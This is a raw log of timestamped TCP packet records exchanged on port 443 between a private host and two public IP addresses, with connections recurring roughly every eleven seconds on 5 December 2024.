                                                        Dec 5, 2024 17:05:49.783770084 CET44349782142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:05:49.783893108 CET49782443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:05:49.783907890 CET44349782142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:05:50.094724894 CET44349782142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:05:50.094851971 CET44349782142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:05:50.094954967 CET49782443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:05:50.095014095 CET44349782142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:05:50.095112085 CET49782443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:05:50.095134974 CET44349782142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:05:50.095231056 CET49782443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:05:50.095307112 CET49782443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:05:50.095504999 CET49782443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:05:50.095504999 CET49782443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:05:50.095561981 CET44349782142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:05:50.095690966 CET49782443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:00.116357088 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.116466045 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.116797924 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.116916895 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.116955996 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.389113903 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.389316082 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.389524937 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.392263889 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.392457962 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.393656969 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.393702984 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.394695044 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.394969940 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.395272017 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.438451052 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.674102068 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.674318075 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.674350977 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.674597025 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.674657106 CET49783443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:00.674695015 CET44349783142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:00.702100992 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:00.702169895 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:00.702322006 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:00.702490091 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:00.702522039 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:00.973767996 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:00.974040031 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:00.974339008 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:00.974383116 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:00.974430084 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:00.974462986 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:01.284775019 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:01.284909010 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:01.284998894 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:01.285057068 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:01.285090923 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:01.285330057 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:01.285423040 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:01.285466909 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:01.285537958 CET44349784142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:01.285592079 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:01.285660028 CET49784443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:11.301685095 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.301729918 CET44349785142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:11.302083015 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.302195072 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.302213907 CET44349785142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:11.572334051 CET44349785142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:11.572740078 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.573447943 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.573501110 CET44349785142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:11.573643923 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.573707104 CET44349785142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:11.855062008 CET44349785142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:11.855256081 CET44349785142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:11.855272055 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.855506897 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.855576992 CET49785443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:11.855629921 CET44349785142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:11.862894058 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:11.863002062 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:11.863318920 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:11.863437891 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:11.863472939 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.134929895 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.135263920 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:12.135680914 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:12.135749102 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.135771036 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:12.135790110 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.449760914 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.449968100 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.450057983 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:12.450124025 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.450150967 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.450192928 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:12.450356007 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:12.450613976 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:12.450614929 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:12.450671911 CET44349786142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:12.450831890 CET49786443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:22.471076965 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:22.471185923 CET44349787142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:22.471765995 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:22.471765995 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:22.471920013 CET44349787142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:22.746696949 CET44349787142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:22.746926069 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:22.747303963 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:22.747345924 CET44349787142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:22.747467041 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:22.747510910 CET44349787142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:23.018071890 CET44349787142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:23.018280983 CET44349787142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:23.018322945 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:23.018484116 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:23.018484116 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:23.018534899 CET44349787142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:23.018589973 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:23.018795013 CET49787443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:23.025353909 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.025434971 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.025691032 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.025809050 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.025842905 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.299158096 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.299411058 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.299829960 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.299900055 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.299925089 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.299942970 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.624998093 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.625211000 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.625236034 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.625299931 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.625406981 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.625439882 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.625497103 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.625699997 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.625869036 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.625909090 CET44349788142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:23.625926018 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:23.626013041 CET49788443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:33.640361071 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:33.640469074 CET44349789142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:33.640772104 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:33.640892982 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:33.640928984 CET44349789142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:33.913292885 CET44349789142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:33.913547039 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:33.913935900 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:33.913979053 CET44349789142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:33.914108992 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:33.914153099 CET44349789142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:34.189876080 CET44349789142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:34.190073013 CET44349789142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:34.190139055 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:34.190326929 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:34.190326929 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:34.197195053 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.197305918 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.197587967 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.197750092 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.197802067 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.469453096 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.469671011 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.469957113 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.470001936 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.470046997 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.470072985 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.498760939 CET49789443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:34.498841047 CET44349789142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:34.789149046 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.789268017 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.789365053 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.789424896 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.789442062 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.789705992 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.789828062 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:34.790018082 CET44349790142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:34.790235996 CET49790443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:44.809979916 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:44.810091972 CET44349791142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:44.810312986 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:44.810513020 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:44.810550928 CET44349791142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:45.083823919 CET44349791142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:45.084024906 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:45.084327936 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:45.084376097 CET44349791142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:45.084470034 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:45.084521055 CET44349791142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:45.359512091 CET44349791142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:45.359760046 CET44349791142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:45.359765053 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:45.360001087 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:45.360093117 CET49791443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:45.360152006 CET44349791142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:45.367312908 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.367424011 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.367727995 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.367846966 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.367885113 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.634264946 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.634464979 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.634623051 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.635725021 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.635740042 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.636053085 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.636281013 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.636599064 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.678261995 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.949985981 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.950042009 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.950310946 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.950314999 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:45.950491905 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.950493097 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.950737000 CET49792443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:45.950756073 CET44349792142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:55.963562012 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:55.963603973 CET44349793142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:55.963865995 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:55.964088917 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:55.964098930 CET44349793142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:56.233535051 CET44349793142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:56.233769894 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:56.234112978 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:56.234144926 CET44349793142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:56.234266043 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:56.234302998 CET44349793142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:56.506918907 CET44349793142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:56.506969929 CET44349793142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:56.507188082 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:56.507361889 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:56.507361889 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:56.507421970 CET44349793142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:06:56.507630110 CET49793443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:06:56.513885021 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:56.513978004 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:56.514239073 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:56.514467955 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:56.514517069 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:56.785268068 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:56.785548925 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:56.785851955 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:56.785895109 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:56.785928965 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:56.785950899 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:57.095573902 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:57.095765114 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:57.095799923 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:57.095819950 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:57.095927000 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:57.095977068 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:57.096010923 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:57.096123934 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:57.096148014 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:57.096277952 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:57.096323967 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:57.096551895 CET44349794142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:06:57.097318888 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:06:57.097318888 CET49794443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:07.117338896 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.117432117 CET44349795142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:07.117655039 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.117830992 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.117906094 CET44349795142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:07.384371996 CET44349795142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:07.384567022 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.384916067 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.384923935 CET44349795142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:07.385018110 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.385027885 CET44349795142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:07.657526016 CET44349795142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:07.657584906 CET44349795142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:07.657820940 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.657820940 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.657850027 CET49795443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:07.661304951 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:07.661329031 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:07.661515951 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:07.661676884 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:07.661689997 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.045742989 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.045952082 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:08.046190977 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:08.046195984 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.046350002 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:08.046360016 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.376636982 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.376672029 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.376887083 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:08.376903057 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.377089977 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:08.377310038 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:08.377357960 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.377485037 CET44349796142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:08.377594948 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:08.377669096 CET49796443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:18.380565882 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:18.380630016 CET44349797142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:18.380812883 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:18.380995035 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:18.381030083 CET44349797142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:18.769385099 CET44349797142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:18.769625902 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:18.769923925 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:18.769938946 CET44349797142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:18.769995928 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:18.770005941 CET44349797142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:19.045032024 CET44349797142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:19.045207977 CET44349797142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:19.045270920 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:19.045330048 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:19.045330048 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:19.045375109 CET49797443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:19.053487062 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.053523064 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.053705931 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.053889036 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.053908110 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.327877045 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.328082085 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.329265118 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.329276085 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.329643965 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.329888105 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.330138922 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.370208979 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.652801991 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.652915001 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.652985096 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:19.653039932 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.653141022 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.653620005 CET49798443192.168.11.20142.250.64.193
                                                        Dec 5, 2024 17:07:19.653647900 CET44349798142.250.64.193192.168.11.20
                                                        Dec 5, 2024 17:07:29.659518957 CET49799443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:29.659631014 CET44349799142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:29.659946918 CET49799443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:29.660068035 CET49799443192.168.11.20142.250.217.238
                                                        Dec 5, 2024 17:07:29.660106897 CET44349799142.250.217.238192.168.11.20
                                                        Dec 5, 2024 17:07:29.933001995 CET44349799142.250.217.238192.168.11.20
